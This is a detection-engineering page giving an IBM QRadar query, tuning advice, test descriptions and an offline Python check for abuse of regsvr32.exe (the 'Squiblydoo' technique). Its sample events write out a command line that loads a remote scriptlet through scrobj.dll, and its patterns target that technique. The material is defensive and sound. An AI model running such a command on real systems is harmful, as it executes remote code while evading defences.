Detect Regsvr32 in IBM QRadar
Adversaries may abuse regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a signed Microsoft command-line program used to register and unregister OLE controls, including DLLs, on Windows systems. The 'Squiblydoo' variation passes the URL of a remote COM scriptlet (.sct) file through the /i: argument with scrobj.dll as the handler; run with /s /n /u, the scriptlet executes without registering anything, so no registry changes or persistent artifacts are left behind. The technique has been used by QakBot, Emotet, Dridex, Valak, Astaroth, TA551 and many APTs, including APT32, APT29, Kimsuky, Cobalt Group, Leviathan and Storm-0501, and is one of the most abused LOLBins in the threat landscape.
MITRE ATT&CK
- Tactic: Defense Evasion
- Technique: T1218 System Binary Proxy Execution
- Sub-technique: T1218.010 Regsvr32
- Canonical reference: https://attack.mitre.org/techniques/T1218/010/
QRadar Detection Query
SELECT
  DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS EventTime,
  LOGSOURCETYPENAME(devicetype) AS LogSourceType,
  sourceip AS SourceIP,
  username AS Username,
  "Image" AS ProcessImage,
  "CommandLine" AS ProcessCommandLine,
  "ParentImage" AS ParentImage,
  "ParentCommandLine" AS ParentCommandLine
FROM events
WHERE
  devicetype IN (12, 52, 198, 433)
  AND (
    "Image" ILIKE '%regsvr32.exe'
    OR "ParentImage" ILIKE '%regsvr32.exe'
  )
  AND (
    "CommandLine" ILIKE '%http://%'
    OR "CommandLine" ILIKE '%https://%'
    OR "CommandLine" ILIKE '%scrobj%'
    OR "CommandLine" ILIKE '%/i:%'
    OR "CommandLine" IMATCHES '.*(temp|appdata|downloads|public|desktop|programdata).*'
    OR "ParentImage" IMATCHES '.*(winword|excel|outlook|powerpnt|cmd|powershell|wscript|cscript|mshta)[.]exe'
    OR (
      "ParentImage" ILIKE '%regsvr32.exe'
      AND "Image" IMATCHES '.*(cmd|powershell|wscript|cscript|rundll32|certutil)[.]exe'
    )
  )
ORDER BY starttime DESC
LAST 24 HOURS

IBM QRadar AQL detection for regsvr32.exe abuse, targeting Sysmon ProcessCreate events (Event ID 1) parsed by the Microsoft Windows DSM, with "Image", "CommandLine", "ParentImage" and "ParentCommandLine" as custom event properties. Substring matches use ILIKE (case-insensitive LIKE) and alternations use IMATCHES (case-insensitive Java regex, which must match the whole value, hence the leading .*); the 24-hour window is expressed with the AQL LAST clause rather than a DATEADD expression, which AQL does not provide. The query matches remote SCT (Squiblydoo) loading via HTTP/S URLs, scrobj.dll COM scriptlet execution, inline /i: script execution, regsvr32.exe invoked against DLLs in user-writable locations (temp, AppData, Downloads, Public, Desktop, ProgramData), suspicious Office and script-host parent processes, and dangerous binaries spawned as children of regsvr32.exe. The devicetype values are intended to cover the Windows Security, Sysmon and Snare-formatted Windows log source types; confirm them in your deployment before relying on the filter (for example with SELECT devicetype, LOGSOURCETYPENAME(devicetype) AS name, COUNT(*) FROM events GROUP BY devicetype LAST 24 HOURS), and confirm that the four property names match the custom event properties your DSM actually populates, since a missing property silently matches nothing.
Data Sources: Sysmon ProcessCreate (Event ID 1) and Windows Security process creation (Event ID 4688) events, ingested through the Microsoft Windows DSM.
Required Tables: events
False Positives & Tuning
- Automated software distribution systems (SCCM, Intune, PDQ Deploy) that legitimately invoke regsvr32.exe from cmd.exe or powershell.exe wrappers to register COM components during managed deployments; these match the suspicious-parent clause and are best excluded on the parent command line or deployment path rather than by dropping cmd.exe and powershell.exe from the parent list
- Software installers that stage components in ProgramData or AppData before calling regsvr32.exe, which trigger the user-writable-path clause on otherwise benign setups
- Security and EDR agents that spawn regsvr32.exe during telemetry collection or hook injection, which can appear as a suspicious parent-child relationship
Testing Methodology
Validate this detection against three Atomic Red Team test cases for T1218.010. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Squiblydoo - Regsvr32 Remote SCT Execution
Expected signal: Sysmon Event ID 1: regsvr32.exe with /s /n /u /i: URL and scrobj.dll in the command line. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080. Security Event ID 4688. Sysmon Event ID 7: scrobj.dll loaded by regsvr32.exe.
- Test 2: Regsvr32 DLL Execution from Temp Directory
Expected signal: Sysmon Event ID 11: DLL written to Temp. Sysmon Event ID 1: regsvr32.exe with /s and a Temp path in the command line. Sysmon Event ID 7: DLL loaded by regsvr32.exe. Security Event ID 4688.
- Test 3: Regsvr32 Launched from PowerShell Parent
Expected signal: Sysmon Event ID 1 for powershell.exe, then for regsvr32.exe with ParentImage ending in powershell.exe, which satisfies the suspicious-parent clause. Security Event ID 4688 for both. Regsvr32 fails (no valid DLL), but the process creation event is still emitted.
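The following Python is an added, offline illustration of the query's logic; it is not code from this page, from Atomic Red Team or from IBM QRadar. It mirrors each clause of the AQL WHERE condition, parses the rendered "Key: value" layout of a Sysmon Event ID 1 message, and runs the three test scenarios above plus a benign software-distribution case from the tuning section and a regsvr32-spawns-cmd.exe case. The sample messages, the process and DLL names in them, and the ccmcache exclusion pattern are constructed for the example; the property names Image, CommandLine, ParentImage and ParentCommandLine are assumed to match the custom event properties the query uses.

```python
import re
from typing import Dict, Iterable, List

# Indicator patterns mirroring the AQL WHERE clause (all case-insensitive).
REGSVR32 = re.compile(r"regsvr32\.exe$", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
SCROBJ = re.compile(r"scrobj", re.I)
INLINE_SCRIPT = re.compile(r"/i:", re.I)
SUSPICIOUS_PATH = re.compile(r"temp|appdata|downloads|public|desktop|programdata", re.I)
SUSPICIOUS_PARENT = re.compile(
    r"(winword|excel|outlook|powerpnt|cmd|powershell|wscript|cscript|mshta)\.exe$", re.I)
SUSPICIOUS_CHILD = re.compile(
    r"(cmd|powershell|wscript|cscript|rundll32|certutil)\.exe$", re.I)


def parse_event(message: str) -> Dict[str, str]:
    """Turn the 'Key: value' lines of a rendered Sysmon Event ID 1 message into a dict."""
    fields: Dict[str, str] = {}
    for line in message.strip().splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)  # split on the first colon only; values may contain ':'
        fields[key.strip()] = value.strip()
    return fields


def evaluate(event: Dict[str, str], exclusions: Iterable[str] = ()) -> List[str]:
    """Return the indicator names that fire for one ProcessCreate event; [] means no alert.

    `exclusions` are regexes matched against ParentCommandLine; a hit suppresses the
    event. This is the tuning hook for the software-distribution false positives.
    """
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    cmdline = event.get("CommandLine", "")
    # Scope: regsvr32.exe is either the process or its parent, as in the AQL.
    if not (REGSVR32.search(image) or REGSVR32.search(parent)):
        return []
    if any(re.search(p, event.get("ParentCommandLine", ""), re.I) for p in exclusions):
        return []
    fired: List[str] = []
    if REMOTE_URL.search(cmdline):
        fired.append("RemoteSCT")
    if SCROBJ.search(cmdline):
        fired.append("ScrObj")
    if INLINE_SCRIPT.search(cmdline):
        fired.append("InlineScript")
    if SUSPICIOUS_PATH.search(cmdline):
        fired.append("SuspiciousPath")
    if SUSPICIOUS_PARENT.search(parent):
        fired.append("SuspiciousParent")
    if REGSVR32.search(parent) and SUSPICIOUS_CHILD.search(image):
        fired.append("SuspiciousChild")
    return fired


# Constructed sample messages (not real telemetry): one per test scenario, a benign
# SCCM-style wrapper, and regsvr32.exe spawning cmd.exe. Hostnames, users and paths are made up.
SAMPLE_EVENTS = {
    "squiblydoo": r"""
Process Create:
UtcTime: 2024-05-01 10:15:02.114
Image: C:\Windows\System32\regsvr32.exe
CommandLine: regsvr32.exe /s /n /u /i:http://127.0.0.1:8080/RegSvr32.sct scrobj.dll
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\Windows\System32\cmd.exe"
""",
    "temp_dll": r"""
Process Create:
Image: C:\Windows\System32\regsvr32.exe
CommandLine: regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\loader.dll
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe -NoProfile
""",
    "powershell_parent": r"""
Process Create:
Image: C:\Windows\System32\regsvr32.exe
CommandLine: regsvr32.exe /s C:\Windows\System32\missing.dll
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe -NoProfile
""",
    "sccm_wrapper": r"""
Process Create:
Image: C:\Windows\System32\regsvr32.exe
CommandLine: regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe /c C:\Windows\ccmcache\a1\install.cmd
""",
    "regsvr32_spawns_cmd": r"""
Process Create:
Image: C:\Windows\System32\cmd.exe
CommandLine: cmd.exe /c whoami
ParentImage: C:\Windows\System32\regsvr32.exe
ParentCommandLine: regsvr32.exe /s /n /u /i:http://127.0.0.1:8080/RegSvr32.sct scrobj.dll
""",
}


def run_detection(exclusions: Iterable[str] = ()) -> Dict[str, List[str]]:
    """Evaluate every sample event and return {name: indicators that fired}."""
    return {name: evaluate(parse_event(msg), exclusions) for name, msg in SAMPLE_EVENTS.items()}


if __name__ == "__main__":
    for name, fired in run_detection(exclusions=[r"\\ccmcache\\"]).items():
        print(f"{name:22} {'ALERT' if fired else 'ok   '} {fired}")
```

Running the module prints one line per sample; the sccm_wrapper event alerts on the suspicious-parent clause alone until the ccmcache exclusion is applied, which is the tuning approach the false-positive section recommends: suppress on the wrapper's command line or path, not by removing cmd.exe or powershell.exe from the parent list.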
References (6)
- https://attack.mitre.org/techniques/T1218/010/
- https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
- https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/
- https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md
- https://support.microsoft.com/en-us/kb/249873